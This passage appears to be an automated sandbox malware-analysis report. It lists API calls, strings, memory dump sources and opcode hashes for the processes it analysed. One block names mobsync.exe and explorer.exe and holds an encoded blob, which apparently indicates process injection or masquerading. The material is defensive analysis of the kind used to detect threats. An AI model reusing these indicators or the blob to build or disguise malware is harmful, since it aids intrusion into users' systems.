                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Stringtry_get_function
                                                                                                                                                                      • String ID: LCMapStringEx
                                                                                                                                                                      • API String ID: 2588686239-3893581201
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 1838369231-1405518554
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6FE1085BE), ref: 00007FF6FE10BB58
                                                                                                                                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6FE1085BE), ref: 00007FF6FE10BB9E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultUsertry_get_function
                                                                                                                                                                      • String ID: GetUserDefaultLocaleName
                                                                                                                                                                      • API String ID: 3217810228-151340334
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F045
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FF6FE11496C,?,?,?,?,?,?,?,?,00007FF6FE112177), ref: 00007FF6FE11F05F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                                                                                                      • API String ID: 539475747-3084827643
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11EF01
                                                                                                                                                                      • TlsSetValue.KERNEL32(?,?,8000000000000000,00007FF6FE11AC42,?,?,8000000000000000,00007FF6FE116A2D,?,?,?,?,00007FF6FE11AE29), ref: 00007FF6FE11EF18
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Valuetry_get_function
                                                                                                                                                                      • String ID: FlsSetValue
                                                                                                                                                                      • API String ID: 738293619-3750699315
                                                                                                                                                                      • Opcode ID: 62cd9636d67e5ce5c82c1edbb01e06b21be09cd90d2af876ab34d084c39e020e
                                                                                                                                                                      • Instruction ID: 02635ee799c8678495d495d43cdf7b766698083974c1f7d37368c3f1f825e9db
                                                                                                                                                                      • Opcode Fuzzy Hash: 62cd9636d67e5ce5c82c1edbb01e06b21be09cd90d2af876ab34d084c39e020e
                                                                                                                                                                      • Instruction Fuzzy Hash: B5E06561E1854795FB04CB96FC410B96A61AFF9780F884035F93D863D5EE3CE485C340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Wcsftime$_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4239037671-0
                                                                                                                                                                      • Opcode ID: b7cdc139778069345d05bc1a0203156a00a62fb54fc34efc2fb8fe5e1c560dcb
                                                                                                                                                                      • Instruction ID: 7ce52e786e12d39dab642d4892a3c8934f6442b7883980e2422f9b26f35470ca
                                                                                                                                                                      • Opcode Fuzzy Hash: b7cdc139778069345d05bc1a0203156a00a62fb54fc34efc2fb8fe5e1c560dcb
                                                                                                                                                                      • Instruction Fuzzy Hash: F1810572B04A0182EBA0EFA5C08537DAB61FB44B99F804637EE5EA7785DF38D041C311
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 59578552-0
                                                                                                                                                                      • Opcode ID: 088d467cec947a303d1071b944324c29810d5aa90d0137deb7dd50eed9953ca4
                                                                                                                                                                      • Instruction ID: 623670d79a889d3c36aae35934626c391705c2aba0e9a4a0cc5937caf5f8394f
                                                                                                                                                                      • Opcode Fuzzy Hash: 088d467cec947a303d1071b944324c29810d5aa90d0137deb7dd50eed9953ca4
                                                                                                                                                                      • Instruction Fuzzy Hash: ACE0E620E5D543C6E99AF7E548423BC9D905F49321FD0413BE22D713C2CD3C25625A73
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • explorer.exe, xrefs: 00007FF7E3D62F76
                                                                                                                                                                      • @, xrefs: 00007FF7E3D63096
                                                                                                                                                                      • FBtx+cQ0wBf1QaR/F3NyW2buPGRwuoe8XWPJF+s/XkGNNyrUqBweCIM5LbxzHXsAWbL2LktkJjnllVbj6BGrqrqYneuqzN3tjTEBSUZlWEfQHxmm0HfxZ4W7xd7Etp7tjxqdtXY+9v/AmBnr+JWYRqKSraPDrzg/TJgshMz+ZokplO4ccfvRwhMziznOglinvB1lUmTLGC79cHnwg2VgF+aqLvG92DRJirkU5ivdR4L9Y6Gu44KypBugLL1iski5Vtdj, xrefs: 00007FF7E3D63240
                                                                                                                                                                      • R]7, xrefs: 00007FF7E3D633CB
                                                                                                                                                                      • C:\Windows\System32\mobsync.exe, xrefs: 00007FF7E3D6303C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Window$Concurrency::cancel_current_taskConsoleMitigationPolicyProcessShow
                                                                                                                                                                      • String ID: @$C:\Windows\System32\mobsync.exe$FBtx+cQ0wBf1QaR/F3NyW2buPGRwuoe8XWPJF+s/XkGNNyrUqBweCIM5LbxzHXsAWbL2LktkJjnllVbj6BGrqrqYneuqzN3tjTEBSUZlWEfQHxmm0HfxZ4W7xd7Etp7tjxqdtXY+9v/AmBnr+JWYRqKSraPDrzg/TJgshMz+ZokplO4ccfvRwhMziznOglinvB1lUmTLGC79cHnwg2VgF+aqLvG92DRJirkU5ivdR4L9Y6Gu44KypBugLL1iski5Vtdj$R]7$explorer.exe
                                                                                                                                                                      • API String ID: 4262344479-4185684469
                                                                                                                                                                      • Opcode ID: a468b3e6b28607d6e2ec463ba5eb1e3f63ae2e4094c7e7b9fc94da40cd4cfa08
                                                                                                                                                                      • Instruction ID: ac19a3cb6387c2639ee42f58477c7aad2940453db622b449d287124bf452df38
                                                                                                                                                                      • Opcode Fuzzy Hash: a468b3e6b28607d6e2ec463ba5eb1e3f63ae2e4094c7e7b9fc94da40cd4cfa08
                                                                                                                                                                      • Instruction Fuzzy Hash: 52E1F232A18B8585EB50DFA4D4443ADBB61FB45794F904236DAAD17BE9CF3CE080C751
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID: [!] PAUSE$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                      • API String ID: 2081738530-3229271104
                                                                                                                                                                      • Opcode ID: 4b47cfc8a2ab3d0877d47af7543c7d0808fcd3ae3f20c1146f8bb5cf32415501
                                                                                                                                                                      • Instruction ID: ecb931074730393de39d22af678fdcc01959d80aaa59609b9809870c2b645797
                                                                                                                                                                      • Opcode Fuzzy Hash: 4b47cfc8a2ab3d0877d47af7543c7d0808fcd3ae3f20c1146f8bb5cf32415501
                                                                                                                                                                      • Instruction Fuzzy Hash: 20E19E72608E4182EBA0EF95E440379ABA1FB84F94F998533DA6E937A5CF3DD441C311
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 2967684691-1405518554
                                                                                                                                                                      • Opcode ID: 00c924be77ec5e6de29e7d77c401772db9bcaf2481e1327176cac6107a81c22f
                                                                                                                                                                      • Instruction ID: a6da00fd217ffaefac954e7e7332b453afce0bc35d43d80c12cfb64eb757e8bc
                                                                                                                                                                      • Opcode Fuzzy Hash: 00c924be77ec5e6de29e7d77c401772db9bcaf2481e1327176cac6107a81c22f
                                                                                                                                                                      • Instruction Fuzzy Hash: C2419B22B09B4189EB91EFA4D4503BCBBB4EF44748F84447ADE4D32A99DE38D5169322
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3638128798-0
                                                                                                                                                                      • Opcode ID: 49bdca32bcec916e7f7748a8719e7af450ff2d19f91812179d5dd9a257b79687
                                                                                                                                                                      • Instruction ID: 464c675ee1218c6d5c02570fac2af139b372227e053dde65525fb290553b7713
                                                                                                                                                                      • Opcode Fuzzy Hash: 49bdca32bcec916e7f7748a8719e7af450ff2d19f91812179d5dd9a257b79687
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B315E21E0CA4781EAD4FBE194113B9DA91AF41790FC44437E62E273D3CE7EA8458233
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: 4a5a4178b89e75a6764050cf1db7e4da5d1539da0e5c1199342dfec5e059194f
                                                                                                                                                                      • Instruction ID: 4e03b0d6a3665f4c67e082645c90d057ecc664176a86eb4c3e7a60ae869e753b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a5a4178b89e75a6764050cf1db7e4da5d1539da0e5c1199342dfec5e059194f
                                                                                                                                                                      • Instruction Fuzzy Hash: 00E01A20A0424182EA94FBB09895379AA62AF84742F90543AC84E17392CD7EB4698332
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: try_get_function
                                                                                                                                                                      • String ID: AppPolicyGetProcessTerminationMethod
                                                                                                                                                                      • API String ID: 2742660187-2031265017
                                                                                                                                                                      • Opcode ID: e6b2794a858986ddbfee4fa39289e9d0355e1d80311a3fc734e7953c29080ccc
                                                                                                                                                                      • Instruction ID: 93d25a6376ddb7dc1dfc1dfea445675dfa850de24fbd032c070bfd66a777a60c
                                                                                                                                                                      • Opcode Fuzzy Hash: e6b2794a858986ddbfee4fa39289e9d0355e1d80311a3fc734e7953c29080ccc
                                                                                                                                                                      • Instruction Fuzzy Hash: 75E04851E0450691FB44EBD9B4443B09715EF58370EC80333EA3C2A3E09E7CA9958311
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 73155330-0
                                                                                                                                                                      • Opcode ID: f19c406f68e5b55e61e82716ca93a81777c36e173ab4f025d0dcb92144516b81
                                                                                                                                                                      • Instruction ID: d4282b3172a29f09918777de2900f8f882562f8ff551f2db647e2e202c28682e
                                                                                                                                                                      • Opcode Fuzzy Hash: f19c406f68e5b55e61e82716ca93a81777c36e173ab4f025d0dcb92144516b81
                                                                                                                                                                      • Instruction Fuzzy Hash: C541EEA2B18E8981EE54EEA691043BDAB91AB44BE0F984532DBBD577D1DE3CE040C310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileHandleType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3000768030-0
                                                                                                                                                                      • Opcode ID: f0ddef62cf4af00b7afe36782bcc538dcc0aa40ad8084fc7657064176c5912d5
                                                                                                                                                                      • Instruction ID: 79c879d8113177c74a29c8572d8e13196e81ffe8358748c13159ea86e670fb9c
                                                                                                                                                                      • Opcode Fuzzy Hash: f0ddef62cf4af00b7afe36782bcc538dcc0aa40ad8084fc7657064176c5912d5
                                                                                                                                                                      • Instruction Fuzzy Hash: 8531A521A18A4685D7A4DB949580278BA90FB45BA0FA4033BDB6E273F0CF38E551C316
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1173176844-0
                                                                                                                                                                      • Opcode ID: 70ba62f8a97dc7050fa898f7d0c2f8790c8e7e4e5b6d22f14cc08e110f66fe0c
                                                                                                                                                                      • Instruction ID: 03e49e8fd1f83a7c58b34435c5193831bb166d8b458db37b9867f49be0b0bc30
                                                                                                                                                                      • Opcode Fuzzy Hash: 70ba62f8a97dc7050fa898f7d0c2f8790c8e7e4e5b6d22f14cc08e110f66fe0c
                                                                                                                                                                      • Instruction Fuzzy Hash: F7E0EC80E1990B45F9D8B1E214163B489808F05371EA81B33D97F242C7FD3DA8568532
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                      • Opcode ID: e425f939b461e09f0642d912a4c298c6d0487223980a7e59e57d9a8a5d610ba6
                                                                                                                                                                      • Instruction ID: eedc824f900a8d1d84055f7c162a3391715c2b0073d7fa1c11ae7ab0b50ab25f
                                                                                                                                                                      • Opcode Fuzzy Hash: e425f939b461e09f0642d912a4c298c6d0487223980a7e59e57d9a8a5d610ba6
                                                                                                                                                                      • Instruction Fuzzy Hash: E1218032E04B4189FBA0EFA4C4443FD7AA0FB04709F84453AD60D23A85DF78D595CBA1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 5a7425f769f0ef5d05a00a5751305ae3355cb41b9d71f6080b861222f13c97f2
                                                                                                                                                                      • Instruction ID: 965952c1007ee229a41bc5da5aab32d6eb080e29b4c576b91684b88ffa9c8721
                                                                                                                                                                      • Opcode Fuzzy Hash: 5a7425f769f0ef5d05a00a5751305ae3355cb41b9d71f6080b861222f13c97f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 46119D3291D64282E2A1EF91E480639FBA8FF80741F950436E66C67796CF3CE8108762
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 01e56fbe2c04021743b4b0bec21fb57d2ee28b38409af7f033e8060478c12aef
                                                                                                                                                                      • Instruction ID: 78b30512ad538fc0be5bd65c4bb96a344f310cb6e1dc199f1103afd8872cf965
                                                                                                                                                                      • Opcode Fuzzy Hash: 01e56fbe2c04021743b4b0bec21fb57d2ee28b38409af7f033e8060478c12aef
                                                                                                                                                                      • Instruction Fuzzy Hash: 0211D632A14B569DEB51EFA0D4813EC3BB4FB04358F900636EA4D26B59DF34D155C3A1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
